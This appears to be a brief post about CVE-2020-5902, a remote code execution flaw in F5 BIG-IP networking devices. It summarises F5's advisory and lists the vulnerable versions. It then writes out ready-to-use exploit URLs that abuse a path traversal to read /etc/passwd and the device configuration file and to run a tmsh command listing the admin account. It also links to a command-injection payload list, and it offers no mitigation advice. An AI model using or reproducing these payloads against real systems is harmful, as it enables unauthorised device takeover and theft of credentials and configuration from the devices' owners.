BIG-IP F5 Remote Code Execution
These attacks are targeting BIG-IP, a multi-purpose networking device manufactured by F5 Networks. BIG-IP devices can be configured to work as traffic shaping systems, load balancers, firewalls, access gateways, rate limiters, or SSL middleware.
On Wednesday, F5 Networks published patches and released a security advisory about a "remote code execution" vulnerability in BIG-IP devices.
F5 said the vulnerability, tracked as CVE-2020-5902, could allow attackers to take full control over unpatched systems that are accessible on the internet.
Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
Vulnerability : Remote Code Execution (RCE)
Score CVE : 10/10https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.confhttps://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
https://github.com/payloadbox/command-injection-payload-list
https://twitter.com/Nep_1337_1998/status/1279610946864820225
https://www.zdnet.com/article/hackers-are-trying-to-steal-admin-passwords-from-f5-big-ip-devices/